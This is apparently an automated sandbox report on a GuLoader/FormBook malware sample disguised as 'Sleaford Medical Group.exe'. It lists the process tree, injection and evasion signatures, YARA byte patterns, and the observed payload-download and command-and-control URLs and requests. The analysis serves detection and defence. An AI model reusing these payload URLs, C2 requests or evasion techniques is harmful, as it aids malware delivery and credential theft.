Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Sleaford Medical Group.exe

Overview

General Information

Sample Name:Sleaford Medical Group.exe
Analysis ID:358420
MD5:dde7e39d025b75849184c077517030ae
SHA1:6350e468239b6099421676fb6ff289a27f8cda5a
SHA256:ba1ae604539b6cde921342baaceb3eb82149b0f15c369b77020b38254a586629
Tags:GuLoader
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Sleaford Medical Group.exe (PID: 2412 cmdline: 'C:\Users\user\Desktop\Sleaford Medical Group.exe' MD5: DDE7E39D025B75849184C077517030AE)
    • Sleaford Medical Group.exe (PID: 5356 cmdline: 'C:\Users\user\Desktop\Sleaford Medical Group.exe' MD5: DDE7E39D025B75849184C077517030AE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 5616 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
          • oversad.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe MD5: DDE7E39D025B75849184C077517030AE)
        • help.exe (PID: 6328 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 6472 cmdline: /c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exeReversingLabs: Detection: 10%
      Multi AV Scanner detection for submitted fileShow sources
      Source: Sleaford Medical Group.exeVirustotal: Detection: 47%Perma Link
      Source: Sleaford Medical Group.exeReversingLabs: Detection: 10%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: Sleaford Medical Group.exeJoe Sandbox ML: detected
      Source: 22.3.Sleaford Medical Group.exe.8cfbb0.0.unpackAvira: Label: TR/Patched.Gen

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: Sleaford Medical Group.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Uses secure TLS version for HTTPS connectionsShow sources
      Source: unknownHTTPS traffic detected: 159.203.144.58:443 -> 192.168.2.3:49734 version: TLS 1.2
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000018.00000000.528248843.000000000E1C0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Sleaford Medical Group.exe, 00000016.00000003.497880207.000000001E1D0000.00000004.00000001.sdmp, help.exe, 0000001C.00000002.734476074.00000000038BF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Sleaford Medical Group.exe, help.exe
      Source: Binary string: help.pdbGCTL source: Sleaford Medical Group.exe, 00000016.00000002.558311091.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: help.pdb source: Sleaford Medical Group.exe, 00000016.00000002.558311091.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000018.00000000.528248843.000000000E1C0000.00000002.00000001.sdmp
      Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop esi
      Source: global trafficHTTP traffic detected: GET /twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h HTTP/1.1Host: www.landingberg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h HTTP/1.1Host: www.landingberg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: 01677937777.burrow.io
      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
      Source: explorer.exe, 00000018.00000003.559663205.000000000F57C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX
      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0
      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.lencr.org0
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmpString found in binary or memory: https://01677937777.burrow.io/XzsF
      Source: Sleaford Medical Group.exeString found in binary or memory: https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin
      Source: Sleaford Medical Group.exe, 00000016.00000002.565857663.0000000000858000.00000004.00000020.sdmpString found in binary or memory: https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin38
      Source: Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmpString found in binary or memory: https://01677937777.burrow.io/spark/binwhyte_utZnZr121.binT
      Source: Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmpString found in binary or memory: https://01677937777.burrow.io/uzTF
      Source: help.exe, 0000001C.00000002.736924910.00000000041BF000.00000004.00000001.sdmpString found in binary or memory: https://www.landingberg.com/twy/?pPX=elx0UibK
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownHTTPS traffic detected: 159.203.144.58:443 -> 192.168.2.3:49734 version: TLS 1.2
      Source: Sleaford Medical Group.exe, 00000000.00000002.459341616.000000000067A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001C.00000002.731169512.000000000333D000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000001C.00000002.736741312.0000000003CCF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D95D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D98F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D96D0 NtCreateKey,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3DA710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3DA770 NtOpenThread,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9760 NtOpenProcess,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9FE0 NtCreateMutant,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3DAD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9560 NtWriteFile,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D95F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9A10 NtQuerySection,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3DA3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3DB040 NtSuspendThread,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D98A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D9950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D99D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00566BBD NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038099A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038096D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038095D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0380A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038099D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038098A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038098F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0380B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038097A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0380A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0380A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038095F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0380AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03809560 NtWriteFile,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED9EA0 NtClose,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED9E20 NtReadFile,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED9F50 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED9D70 NtCreateFile,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED9E9C NtClose,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02ED9F4A NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040663D
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040CAF0
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_0040912A
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B6E30
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45D616
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E462EF7
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46DFCE
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E461FF1
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45D466
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A841F
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E461D55
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E390D20
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E462D07
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4625DD
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581
